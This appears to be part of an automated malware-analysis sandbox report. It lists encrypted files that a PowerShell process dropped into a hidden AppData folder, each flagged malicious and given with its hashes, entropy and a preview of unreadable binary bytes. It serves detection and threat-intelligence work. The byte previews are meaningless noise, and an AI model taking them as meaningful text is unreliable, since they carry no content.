Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	116605
Entropy (8bit):	7.998228009276084
Encrypted:	true
SSDEEP:	3072:xhyJ5CUnGGWE/Wpp+59510GQbIYniFBPm:xhyJlZ//sylU+m
MD5:	5078562D83BAA1D3B0B6684950DC909F
SHA1:	E18D6E2313EFCCD3DF900E6E383684D27F89B322
SHA-256:	1805E91EDDEC90E98C3A382A927C91AD9F1F48E63F9887E4FAE7FBCFC504B3E0
SHA-512:	09D345146CB08DE7E097CC0E2C67F5B5F90D80CDEE2C9811CAD5A6EE1E4EC2D20899C658AE482F21DBEB3EFC766BA392931B9DF62886268F97CA9D7BCB6A458A
Malicious:	true
Reputation:	unknown
Preview:	..!.~...;........]..e}....l..M..._$...q+b...Io..^..!h[W0..f......oV..<'.RU...A.o..=8.jP....[w...$Ui.d..},..eB..h..(.{.u.N.tj.\|....q..D .i..TI..)...dv.....\h..Y>{w}.kE.K'..!..Jc.:ds"...i.......&9......N.j....... ...U..N.n.&..&..MQ.K$:...:.m.0..1....8."L'/P.A..s..9v.....<.t]+.9J.h..C....../f.O.B..e.9.........a.@..tn.....l.$c.......5.....c..%Q...;.v.S."z......}...m?Q-....F..W...n..s]...M...p?....]].n.W.IZ.4.&...6....V....7...p.....Nmd..B\|KN.r.x.....#...x...s.{im........~...%.:vj...}..f......:z.@Y.R.-..y^.Q9d&P..6...F#.8..p...$5..1.si.{..<......Hm.a...O....;./.......W>6-../X.k.....D.....qB._.....L@.N..\.. .AZ&.8h.e..D.4..X......9..*.J;.../.@H.hr.r...0../.o3m;...K..."....ULG..Ut.RG.......7Z..\|'#.@..z.0..'&...76....<zD.gi2.`....jt}....2.b.A.a.e..#.D.e..].. Y\@..k..0..O]u...I.hR....f..0P..m.w.d.....6..M&...f.t}.'....dK...%....&..........C....=....f..:../..&.d. }-JK.....H.... ..Q..~.Q.......8,.f..Xp.=...>......<5P..m....'...U.8.\.z..d.\|...eW

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\rBGChFUaKNZeMT.elwOiYBIHkqPUrJdj Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	107900
Entropy (8bit):	7.99838099796631
Encrypted:	true
SSDEEP:	3072:qe8id8aMPn57WtQAapHu1cFbAMtgVYiyCrOpFcTjWYZ3FnDVjUv:qe8n9OWpHWst9CrOIjVFnDVji
MD5:	41FE4280758C951217E578C971FFB46E
SHA1:	03443B28497C183B71EC884183D27B69540EDFF1
SHA-256:	BAF4E5EE2937B6893B45A0D733B613BDD91A6E00F264EDCA516190097D6490AF
SHA-512:	CB33BAC6A7CD0A376F87C81AE4A975AA5E67835F520C03236F5589A1E36C2293D893D6D706AC0A28E122DC43727AC2C6E7C1031A4F3E9667FAE5597EFD60DA8A
Malicious:	true
Reputation:	unknown
Preview:	p?....\?.a.C$..;.. ..5.Q.........:.....=..7].QQ..N..j.....E.G.e...........B...m.J...#m..H<.X.....H.6P.8.9.QxS..0.[.yq.J..d...'..X..?6WW.W..B...'.<.p`V....#I..W ....F.."k..C{p;.\|:...NT....V3.....O.U..9WM.N.lS.}....Y7V..r.9M./.W. ..M....Y...5..........T....^F......f.D.....&X..t..%..'._....<....w...p.=....-cbq.....P.......`..DT..g#Mq...+.2.F............ G..j..Q..e9..j..I.U..._.3.o.Lw.P..&.?I...MQv%I.,....k.....n...n/JL....aT6_.X.V..{...4e$h......`.G....M#i....C....eNg...'f..NV>.+.3Y.@.R....._..O..z....s`V5..C.w3r..m......3b..TO...roC..T...\..M,z...........YM.......y..\...bT..w]$..b.1.....4..(.lwc.A.. .......in....]^H..aP.X.Y+.m....D...v...z.d..=Kz....]#..5V_l..U..q~..$._......_.... ...A%RhK..]./..1SH8<fs.K:.X..[-,f ...^.~....f....qM..........1N.....f.Q.....L...........p..Z....B..'C065......S.9...2.....e.*Z..4.ZG.w{..).....K...g.UX2a3T._.S.26.[q<..^zRe.;..^q.../..'.{".01..r.M...-K.i..6%..p...U.IW...J!...j...(t.&x.._.;A.%.oXk...W..c<]...Vz;

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\rGoHwmlvfadigxj.rIeUpOXfoltbL Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	125369
Entropy (8bit):	7.998506246027561
Encrypted:	true
SSDEEP:	3072:xZ96cKiO2OybjwVpaNXUAHy81htqY9MlWmNnntN3w1eO6JHdCpkO:PkhiXZjwVpoNy8oYG0mN3OEm
MD5:	561052FF06C462F088CC70E5160ACB3E
SHA1:	7DF93F9A175F4925377D55116BA4D9A82D1092EC
SHA-256:	9BA5476AA5DAFECE2508D88DCFE0CD6B0E91FA8A8D6A664739735DE7FC79CF87
SHA-512:	4EE637F0B5D465E2CFC0CDEE090508F34EA0A12866E73DA575FEE8542B4154E97F02CFDF9EA698BE61F204346B6B50D751C4F2250096059626BF57C3AC1E0A88
Malicious:	true
Reputation:	unknown
Preview:	..7.:.m.Y._A..F......6.eU{.~.......[I....C+BN...V...\|.....g.$...5..hs.:."..1.6m...M.......j.Y.j.w......A.}...\.O.....&%...xB..;....j%."+S..2.....h+..lP.....mq;A0.x.s)....&.2..w.j....ip.."#....Z.W.v .....Q-...2\.I9.....`...S. .....J>iCh......F..S.7>V...I..O...Cl.....m....lDH.B...T...Rte......{.W...3....]....4........3..E..,T.n]0T..!.! j...u.r... De@.IZ..........Uf..Bo..c...c..M....\|......g....r)..R"..r...{XE.D...k.6..a.o...k....B......V.#......\|.o..F...g.@}......%T6<.PK..=.X..<J..y.......O.'.=...5ER.....U..'A..._.H...M\|..~%..Yy.....O...9..(d...x.o....Z.."..s~@.9.8..za?.ll..B.qwj...hd...?..].bCz*.\|...D.2.a..4.8..U../v..:.l+...].......S1)A.p.;%.v..Y....Iq.....A..h.x.}.M....1....&...j.i...l.N..T.u....@.e..............W.?Z...o..R..V6.XB.2....w.2...xg..w...p..s......\|.v....U...K..v...U..1mq.\#.. c.mhk.._.9!...%.\..w....K.....zbol~..I.....>Ym.?...,z....K..................)..[l.emB...+..S.."....$>.#.._..^..r8G.YQ@...j.2.<C..+Q..7-^Av..)E7.9...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\riluWcORBwgDpKaTxJ.pCdHyrlPuktThNvEox Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	62952
Entropy (8bit):	7.997162132900749
Encrypted:	true
SSDEEP:	1536:2onGdvi66JC79htwVU5VxVS/st2OlICiF2vrQFlKs:TnGxiLGQEJS/s4Olxk
MD5:	60B08DD54795FA5FBFA34CE9E02C5E5D
SHA1:	4604E7A83806A2C464976E75E670631E948B1737
SHA-256:	8A9DA0547E8D834390A9A0F9A5DAFFE92B7C62EF168C28FD7BB358B2B4864278
SHA-512:	1704C6E8735B4D013734AB98521EAA795E611940B218BC019F446FBFFD4D89FFB946F71B224CFBBEF8AD01139D6A8F9CF52286F9F4A18605D5CF74156787675F
Malicious:	true
Reputation:	unknown
Preview:	..H..-@.1(..C.......!p6a...w..U.W..L.%>..V.>.Q.....W...N..;.n.E........."A.`.F..h_....e...,V...m.:.(.h.-.,~...........{.9..U.(]>.d.......x_..H...V`.....UY`.l. CZ}E9d..5..,.N.qV.....o5....w..[.JY .\}..+............d.G.`.........,PScM.F.e......n.kc..o.?...m...I.....S..../...DO>.m!..w.g.X.Fq.uvK...".\.4.,.[......(....M.Rk.&.(p.'....H..K..}..(...N....K.....U3..[.......BO!UBV....).F.b.!.F...z..!.#n..)y...1..j_Y..1.SB>.....ik...5..k.z......z.O...p..Q.O....(....Kc..D.2...h....k.A.g....}c{.(....w...>...}..^..>%9=...6...`w.6p:.Y...a9.oZg.y.M....J."..np..g.@p...t.:...1x.hT..\..e&o..,G.B..i..1.zi.3.M...E...R.D...?[GH<.?.9.].7.z^....d.VvAv..{$..i..!F.....).....<.{.@....1&.......[=..(.s..n.s.h.>n..(../u...U......T...S..H..9.M...4..N....j#.~.\.sQ.#.O..\g..;to(p.QH.ZD........&.........I.=`.&..........z...O.....at~..k8,.]EH.]..........F..@..H..3.\|.LY.n..K2.m...s.g.ei.Q..t..n..fM...7..?....^...f.]...........{7.-.<.vE.V.........;e6o.T.\.=Pp...C[.*t..="dI1...y

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\rtIfzbxAeCukFph.maXIOyjYWAFQDHNZt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	194171
Entropy (8bit):	7.998809202360144
Encrypted:	true
SSDEEP:	3072:iHchq6vFrpBehoBraO3pRfJIzM6arXy/B0JVlmR77I3bsGiQ6dkL0Ugd24:ycE6NrXl3pRfWgHr7JjWI3bsG16254
MD5:	15A76B3B385DDD3F416023BBE52F947C
SHA1:	A81E4EA3B5A138F7CC465FECDB95FB290A736F02
SHA-256:	EB74C875EB13FC670D4F1A58D02D5F00022C16B420565A04E2C57A28EFAC5D86
SHA-512:	DFD7F4AA93FB4B29D2CCA43F62D7B714CAD7334AF1753D9EC5432EAE38B5AD8C6AFDFC69DEDA8E3CBE5311DA156FA701B3077E4DA953F4E8F466A74DE90997C1
Malicious:	true
Reputation:	unknown
Preview:	d."Yp....'.c...,}Hz.H9......\.sP}...7.h,.,.R'L..6.I..I.......m..yE..}I..-^q......K...d...?S[.A.F.a./7=[;VttA..=1.e#q..g.sf...HH....!....w......."f~..[.....VQ..+W^...{d...sO..e.......s.'.......p.q'........k:I.-aY.g....p...ZY1>%"...}.......U.f.>.;..rQ..h....,.'.N..m.4.L..\|.vUK.W~.1.l.mr".%..f.-...cl.....N.......+....m.......`h=....:..@.G02..E..7/5..q+.!.....B...I.F.....P8m...(9...yo].....}...(..h{. .b..4.....P9.1...!.5.`gD.=..P.1^..(0.H...V.".v.\|.::....L....Q\|.n..r..a.Y..EN.;....d.2.T..{/U.We.#.,.f..k./7<.+V~...';.o.. 1~q2D.+..Nn......)q.P...n....aI..\|9`....G/.d..Z8.FR0.Y..........lF.B.....,o..k.Ot...@c.....^..&.}G.....V..9B.\|i..2..ID..}2.)...D..,.........W'h..};..$4...^5,.....<J.....`-p.V.g..y...I:#R.W>.Y%...D..S..... ._.Q'...}......~F1..:.4....U......Y.<.....9...b..&...F.!.5.A..b..00..B>3W.-..P?%.n.2..=.8.Z.^q.%...1....2..~~..yCN.0...Vu[.l.........Q.".5.......I...{.<.M...`.a.Z.B(D3.% ....'.?..:..L`..r...{`.....br..V......

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\sRMtvhOdibu.XGqDaIYhSbevCQU Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	185173
Entropy (8bit):	7.999094576238047
Encrypted:	true
SSDEEP:	3072:fuI8hJNigS0RrGTxg3eI75CwVm/+3SaQX4sBNZueOSFfHqdLTD8Ps5L4bqmlXy7m:fOh5JGlgz75CwVm/8+XHqdL8P6bmli7m
MD5:	6D3EF92843B19DE0BC8DB1D3DD95DA67
SHA1:	3EB7F8ECC00790463E7385BC3B7C1D3A7DBA9163
SHA-256:	565E93425DDC19754099E969BE0992896683A58569B0294AF21E2668F0D0C4EA
SHA-512:	DE064F9A578E24C5A57FF275FC0EE8E8A3D468A6B87D5E9D7204A115E8CDD2B837625368A8641A6AC22741F68B0D870694C9DFD299F695572DED6A9B33CC9B27
Malicious:	true
Reputation:	unknown
Preview:	.<0..cn<L.r.n......U!.}..d.].^Rk.F. ...e7}....d.7j.8r...1.Os.i...^(wm..'...m\|A=p....3 T.ax64=S.8.k..""......A.S..C..7.>.........D....xO...L....UV.....,......=...f.:G.T.?...........IB......:Q.`P!"b..x...&.p9+qh..Y.m.....ao...&...I.y.n_...<Vi..G#^..fb..VvJy.C.J.a...<Fb.;?.Qb........c...".$.<s.......-.+".;..i.-......^...='..N`......pi.8m......~.V=...S).n..x.4L..D..JB.c.....I."-.....y .M...s..:...PD..L.l.......X....!)4...uT..:N..B:.s(}...w.".n..p.#..\.J......1.....v-........D .P..'.(7n..]...+.....`...0k.G1E...\|[...>.....H8..4\|....#=h.E&......K.@......J."#..4...a.k7j.,.......2..;..n...}F..y.....A..I..w.PY.....v.V..q].i.l.{.>...0..2R.....A.....[...n;...UX.;..s.....#..,..W'.b9..l....5...oe{....8~.X.]......8c}......].Wx.X@...A.7V...kZ"R..m-.P...'J.A.O._.....,&.&$&v.K...K..+.w.._W.d....PP.............e..W.=..-....qp\|y...<....q.j..a.A.......r..{>.`4....)..z.7D.:M...=Y......39.....5..d.).(..@.$.g..:.Z6..w..U..og+.t..3%/..7.afd..^5...z..!tUs.l<...S.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\sZUqJLpYjzuVGSoHDPF.hrFcKISQTqC Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	81149
Entropy (8bit):	7.997795292181072
Encrypted:	true
SSDEEP:	1536:N0wQznq7OVtXhKXym4JMQ+dUuht9goXCRZDf+indX3vUMGe5:N0N+74tXhKmeQ1iXCRZDfXnas
MD5:	0FB7FCC1798B43C75204C7371D458AAD
SHA1:	1F0529B785372726D1A2BEDC43ABC7BD325FCC2D
SHA-256:	A020BF66494C0A27FEEB9E257115C6E635486AFC7528A8A3E0C369D1DF06F459
SHA-512:	77DF7895332B1CD48968FAB60E48EF6481B556C6A567CCC8BA9F07B6364D0532AFD76A1A340EF2E6068EF6A7EA6B6C0CC93E5578B1AA6D92A6B1743C84568AEF
Malicious:	true
Reputation:	unknown
Preview:	..g..%....n....RW2......DA..I......"..J...b.Q....e.k.v&.Xoq....U.0"u90L.....p.i..~..R-6....A.e... ....a.y.Md.{..<.p.^...e...&u.v.....z^...6N. .R.Ksw...\4h..R%X.e.SdB5.7.OP.8..z5y........au._}w..j.~?..x.#..Z.....r.hv...........G......r.y.9...{.q..Vv.......K........`..l..~nd_.f..e.J.h-L....Sz....2C.{a.....W{>2.,9.~_l... i.1/.`..#M...{w.....I.MV>A7.B.zA....#..u..d.5......t.....!c....%...... @.<8 6rR.\y....G..t..xr.A=. .iX)T.x..>..<...$Z.k(A<.....S...lYFM...5...Zq.g..f..},.....<.v..O.pbf.Y>...O..F..)-.a. .C-LFQGv1A...S6..)....0.... .I/.....9T..v ...M.;.h.......B.H&r.......Gp..Ht2"....<[.o.\|.....Q.P....B.s.a.......g..z....3..8..].(..f&.yUZo........M.x)f..YM..;....Pd.... z...5..u.C.L../..M...)N.K.^P.....x.}.......8 ...F........Q...RX....O5..X..J....R.8+. ..-.K./.v?..i.Ia...WJ.R,.\|M..,.2$.........$!...^5-....2..[...6..Bx..:.;.w.....C..N...+.Ow......0.u^._..P0d..9..g;.0..._..l...h.y...1T\H..Pp....V.%.^.#.....#.Tp4e.k..$O..........S.2..W.l.A.yM

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\sjSUupZbieHn.NLamXBCwgrf Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	186145
Entropy (8bit):	7.998932213044508
Encrypted:	true
SSDEEP:	3072:eFTMKJ2Z6y/2NmyhplIKJDKF0ifpwpgaTGAt0mTZAEi3nbXPghM7n29hm7:aTM82Z6y/2NbhpRJ4pwlrnZAEknbX4GB
MD5:	E84005EA001C7C95E3655493807C990A
SHA1:	2619B30586930BD2AE8A108BB17ADA8A5575A583
SHA-256:	38C24A9B62AED6476AE9BFE9CECBDBC7CBC857714EC345B7F13936E1AA3FA995
SHA-512:	6F552EB92EFD8544C23E330DF7E5EDAEC8115D434B73AD0D5DB3E60EC62259454F074665A4BE015B139C573C1AB78366DAFBE0DD2367F44E6A84333A6D7F2C47
Malicious:	true
Reputation:	unknown
Preview:	......b.V.]......Z...8...+e.a..?..p....:..A....Ti.\R~.6.......X...&...v...}.dd.{.i....@..=..."...b..%`:.....x...'..#\..kc[v....z.....T..%..........2.......o...(.!v:".....7..\Y.~......1.uKHM..g.N.....7...s].H..&.m.my.9..M...-..qH......./.v.f-ZM&.V.z.5.......g2./.i..(qI.... Uw.0zZ.s.s.F...M..l4,+Y.4.r..K....2{..'.;.......g.5.x.).......@..,@....^.......f....>...]..?%M.b..U."..7CN~S.E.J5.KZ....1.Bl9..$.%\.C..."\f..p...I8.Y..B......X}J..!=..K(.g2y...b........ ....P...F..f....b..."u.(..f.[.;a.ad..-.L.Oy...../&9.N.N['^Xf='.+.....K.8B...P...s.,...C..f..7.w(....th..v.OG.R....D..(M..u.[..\..MM....H......[..p.2-........G..9...a.Q'..J.8..i]~qs1...a....B^.......{...,8AI..q.[.J.L....e&B.......^....?.b..."...S..7.$...KM....+.......#C.A.W.F...'.x.4....i..........8.f..n..h_%...N.U9.x~=3.l..I\|.......?!.!....S....s..p.i).E.@k:.:..;;....vv}.H[.....M..-l.4.........C.]hs.J.re.f.`..D\|...R....g.........J..v...)U=2.3.....@n.9....X..k7_2L.N...A.jq4.e....Zjv.gH....1@..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\suCpkVdZmfBzJbLqT.FhKWAqfaMnvHOU Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PARIX object
Category:	dropped
Size (bytes):	147031
Entropy (8bit):	7.998835398026727
Encrypted:	true
SSDEEP:	3072:vwHSSc2e7vKucc1ONU1I9eM99r3LFXfTsAT:vkZe7jzcNN3br3hNT
MD5:	1F7612576EC3193E7BA3F7254AC5BCF3
SHA1:	5410335EC863F4BE4BA865C550455389E2A1EE35
SHA-256:	0CA8408C59D270DCBBA5A3B6A2CF6CE71490748FE1F2F2E355C72FFC6235D12B
SHA-512:	3651596B8E29F2D5F0DF20F58C67D2D2F2CFD88BDEFB38FB5DB97B82559B51898EC9714E04943CB11B5FCF79D0944B9C18C50F6F3553ADC66983D91FC111070B
Malicious:	true
Reputation:	unknown
Preview:	j....Tp0......3....../.LRE+?\..Y)..n^;.u.~."F...l.......$..eMm.n.u...\|.....o.E.).../.....:^A.0....>.U....u.]S...s.vd..fZ.lL.v.t..\-BQE~.nQ\|/L(W..Hd..M2...J.\|gF.Mh..V......[6.p.0W-mk.-.m..(..5...`+p.6..W..f...$9.....92.t..&......7w.O..>."...\.x..g.g.t.S.}^.'.{=....rF9r....7..n.. .($3.........+...\|..M.M.......0t....n..v.,..........'.n.^?L#.yW..MzzLb.......;t...5M+o9)...F.1.zS,v..<.Fm.ia..j^..j8w.AP....F,..O..H..n.;.......+.#..V.t.%..8..@....."..q...'.P{2T^.i...t]~At...........U-UYo..R..=.6...x..;...T...w..^K0.;........kE.vn..HC......}......o.a.z.+Q....h.......=....._..1k.y...i'A...-...Y......1.D...OC.k..n.....\|..P}.q.g...n.dH`J...W..d.t......,.aP.m...^....<.F2........LBg.o.......lgK.up..K.8\|.....k2... ....H....5.6<K....z.."....7}T..F.!f......{.(. .......a.....H.mx..{...]..r. ..\..;pz........c.;.....$.F.........=.ir.....t..}..W}...4..Q.....R.&.......d/pn*.T..._ .&.5C.....a..... ........J.+.>.1......).<..?Cq..4..`tAq..F=..#.....l.!s.v"..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\swlTBmZAnb.sHcdCtbYaiRFSqGOu Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	89170
Entropy (8bit):	7.997952979313255
Encrypted:	true
SSDEEP:	1536:E1JyIshUs2D+ipt0sY1HwGLGW+4YR3VZNnzOfbLE38AYYErHzx9QBBFehm7H7FLr:A/sS3Q1HNGWUr5zIcKTPGBFWm/7yzJo
MD5:	BB990631AABDD3A46B7789FED895B670
SHA1:	EF89DFCB125F3515947082BC124927E48F0CC905
SHA-256:	3117B8F79064870C83D89BB188726ACD39C68DB4D806D57BB35D7B2A3A8140AE
SHA-512:	3B422D308FFE452F29A8F862140FF10077C3A435FE4E68E6F2290C9A77B60C3863F8B58609EEF9A7AD01A3078901EA00295880C8176FB49CB621C4BAFB028E2F
Malicious:	true
Reputation:	unknown
Preview:	mb.....nk..Z[d...j.........\|.........Wb?\|ci......D.b.u?.c.....^fr..<...A.%..oY....*Cg.1=.....k3<...7....m..>Z<k.@!4.;/..d.g.1...U.[..w.....y...n3.Mc7n.........._...ni..Y?Mr...Dg....v..3.c..S.V..-...q.._...QK...k..#.5..<..i.l3..u..P0E.....Cv.. .V`0.bHO..(0.nn.(..h....;.qm.c.L^..y....epO.e.n].Nx..m..&.&\|.}=....(.zR..5.w:O]..3.{....S#....3...d.qwC.`.jz........~8.....<).....U......e...6)..H.$..[n#.Px%...'\..cE...0.zE6...p.x...~.b5...a(u...^.....q...Zm.m.......:l....\ R.k..Y.mb[~A.....}v..Zk.1.$J!.3......e...&k..g.S..l..R.d..@5.L.(.-....b.c..8.s.G....f..F...9..:..J...%...p......`..=^.......6..............l.4%./.....4..p.\|.. ~.]...[.Q.i%......!..>QR.......LW....O..5..4^Cz.._.Z..l....Jwc.5I.ev51....v.g4.....r@../K...@;.5G....O..>.lb....^..Q.-..5+Ii.qcK@.h..vpS.3.O58<Q3....H.....$t.\|5...c1uiGE...[=....59.....].0.L...cG... ..:?.. .K..5\|.CE)K....8.. 5B...y..w...I.q.K+..ajs.....M..Ea..Uci...'...._$............6+Y......J..SL....(K.b....\|....~

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\swncKuMZhNtO.EUShkCzacdWqJLgHOw Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	93120
Entropy (8bit):	7.998046290543396
Encrypted:	true
SSDEEP:	1536:+j7XVXyP1b7n0ZQLlKEOjWHgsips9WvdxXvB2YySzSPRBTe7QLxwPRKFzEzrV:+HFX01br0lEuWCpswvfQb9PRpshPRKFY
MD5:	C2D34C871D1215B08CAC305BBCAD4521
SHA1:	F92AC297917EBC239E9261EB84CBFDD5617245A0
SHA-256:	D948649FF3F5715967A354C3C9FE39827FF421A43F498EE9B9B6C20DA678755B
SHA-512:	CAB736A3CDF91DE2CA9BB23BA8C2557F9DB6DB1794CFE2A3877A5267F1145B675DDBA598DF599A5E94E25587B6E8EB17DBF26AAC01820E0CD957676851BE29ED
Malicious:	true
Reputation:	unknown
Preview:	....D....Y.c..E..by..}.M..m.k..B~ ...Q[..`....dX.....g....nT. ,..C.(nck.6u.xrA..M....e.!..>..is.!.[U".Ln.o0>. e,..`...$.Zlp.$.....V..\|..:>7.4.....;...GC..../aI.ub;;.F..^@..b.^...qI.(..3#..~..&..o..{.5.W{...`KWV.6.,....p#."4.K.[.@..PG;.l..w..5.'B..~2[&....d"...-...KF.dj2f$>.`Or.C...^.e.E..\J..[~.....!.....DGa.../!Pq%gV.P...W.Gm$.0G...].c..Wj4..9...\|...H..D....<d.jrH..5.:.............M=..D..'.}..N..m.yJ...cd..I...R9.5...J..{..e...q~O.aS.._........{.8.E.7......^.rn.....d.w.4....P......i)V.....jM.!..<.uv.....!.......P.s......2.....&..2;.&8.5.1..=.>..<......X......Z...;Ko..Mn.j4.G...8[.X$.M1=...8.9....Ua...)r.#F.._..y.0p\|..1BH.cqv..3~./........'~5.kzr....</`x....(Kr......mu. .;..p...u....VX.4....}.u.}....1.E.WV.....#.Nj..AL]%.g..e.D.\aO........F..CZ.'M...X..d..P.j.y.R.3.X..c......Qh..t...M4.?.1.[O.......,.G(....i..[w}N$..t..,_F..p..;/.O....O/.I.C.`c=....(2.I.x..$.-.!.Y.7Y.%O....t..0]L.&.Y.>. .H.-!..o.........^["...2K.njPK.R.EX..m.....MYm...n

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\tDilKLmVRNWnXZcYrS.XuaEpJKnWD Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	58104
Entropy (8bit):	7.996635248651727
Encrypted:	true
SSDEEP:	1536:WkfmXePQUwuJFfGyWUyM6eKXw9yTViQKmbIzRXbwyL:oONwuJFf1ceOw9ykXEQRXLL
MD5:	F1960E5738EBDA25188C3CEE7DEE4926
SHA1:	8F62D6928C2FC5DBB5932CE25354157D912DFA31
SHA-256:	17A4E6ED54A3251305441479BBE299BBF53BC73D4F29B9557B051B4E777A9FEC
SHA-512:	B454981CA7EBE8F1C1E429E42EF9B31DB248C060F9F4B21A3C470F730389FA622872BBA5F55DD45DCBC10B7F2EDE09DD938736031209DFA4C17CBB0A80D1CCE8
Malicious:	true
Reputation:	unknown
Preview:	g.D..^.f..E;.....G.}. .l...2..i.IV?#@.....b;.l.E..=.LG"........@.g.........l1.-.....2...iG..".<L."..q...{c1...{\..._x.\..Z...y...6.1{.M.....L.h.,O.{.b.H......jX.p..W.s.k...S..).]1.l...J.J.;l.RX5..^.,.Z.Z..6...d...Ay0)<!Rz..E...0~U.......NT.qQ..7.......w.F...+...^"........v....Eu..Pw.........(4...r"3..O.).....o.!...H}...4..).A,C.>"B..'.{x...t..>...........P~.;.L.$...3....\|.5x..K..H...N..=.'Yc\|>(..-.w....Qp_.M2.Yr.A4.K....P..i....s.iU...3k....'.".c..l....H..c.x.....<..r...)-....i...l[......ai.2...q..h..>I........k.u\.....}......;Y.~.E..:.J.R..+.0..hN.e....Y..~....2....".JY..~....".}...x.F.H.K..W..^..,.......h..a..k..(.TA."..6P.&R..U.pl.Q..1xz..lIT9?.6.w...h.:B\|.....utO.#..,v...........Nq\.6...`\.:.R..T#x_..{..Z.f.-....%.,....8f.9....s.lj..\....2D...,.>(.i@8%.q3=....f1.......wO.L.KC...a .A3D.A(.W....}Wq!LW.h..W...91CE&\Nv.......n-..p}.D.xJ.m.?...cJ..!..E...,../....:.....m.gq..W..g...Y..L..>.$.....@=./..HR.2..X.n)o..........B.]!..?&n.oR

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\tdhHyzrioAPWpJk.JrajoNHidsXnIChLqU Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	180651
Entropy (8bit):	7.9991279430840025
Encrypted:	true
SSDEEP:	3072:f052Mv0dTKfuuM19Wq0SgtHuwYr1MffqZzWh+UFjBuVdSWhPd2xhemYGM3SlTJow:fi2MQ1Mq0S2Huvmffq1e+UFjGdS8kxsU
MD5:	BE7A47F8045789EC528AC009FD42AF20
SHA1:	1B52114EB60D8BB9A84D7C18D10A44EFE9A4F304
SHA-256:	B6ED2FF15FD5871955D33A0B8C11AF66C428371135B2E316910A01A6107E4C64
SHA-512:	C6E1CBDF3CC69DABDC8D59AA5EE5FA5A2AD75F5DF5E6D778387481660BCF36A701D72BB320A497C44D979F2808D3E940E4CDA21BEC617FA1ED2305D66EBA7EBF
Malicious:	true
Reputation:	unknown
Preview:	k...O....P.t.h.....(..y...x........%..(..1...XI.w.r.........h..+.....x...}.-..bc`..2.:.t%}..Q...{g.....`..-....l'{H...A.zQ..M....:V.W$..NZ...rl.s[.u.L`.h.t...K.-...Vi.y..y..L."K....aR.+]..+a.D...[.l...?.`.''p:.Q./.I\|.>j(..3..O\..GV.R...[^5hV..`&fJ..i-S.f^..}.W..3....?.5.\.\g...O..(w.&l....i.....\.p.(M...m;\.........{m.......@$.....Y......K.....NI..w.MR&Zz..p...c/.&^n...........oH......=.....i.'..m.5..ne..\|..[..e..1..!......O.!..@*...1F.p4(.h.M.g;#..^..a..t..9..%r..f..k..a.B..\..4!.j1&i/...W.......-D.........=<y.C....a...Js.l._.j..4L.dI6.......X.6..0;.....j.;.}s.r....U.+S790.4...M..:.].y.v.c.O..-.I.Bx$..Hm.N..yGF....AV...<.........5....N.X0..c%G.s...O.....l...l:.b.kbi. \|Q..d..{...~~..........y.q...em.z.0%....2..h.T5..b.%...$...s..;.........F];<5...g.`.t...x....Q.-..(..9..........}..!...G.a..t}....v!...f!.M......b...K.Y...0j3..x.....n...MH:\. .x.5......V.6..~."..H.GbP.}I..".u...H{[...F.....0:.K5/..X....4...x...c..\H/...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\thIyUJBgrDZ.ByoVZGPmwzRAsMeq Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	141578
Entropy (8bit):	7.998559761190062
Encrypted:	true
SSDEEP:	3072:VVUQovPRehKR/rK+0zZoXhZSFDFBxJcd890RFNeenyD/Odw:EfvPR0SDKlya1FLM89AiGW
MD5:	ADD8D01EB95316B00B194AAE2F5557FB
SHA1:	2635A62826DA647340B9D4DDEC3CD818BB420D35
SHA-256:	F693E98838C6E8FB5ED8C88684944CF7183D16155BD579D92A03FB7F20DF6E0F
SHA-512:	A64018A0A9C0650F762D948E514B9252851FC99C808643D3B990EECD831BDA3F36DFE67CF8B01ED3BB6A488D2E9033D78615F32B149A15143FBDDA9F235E1635
Malicious:	true
Reputation:	unknown
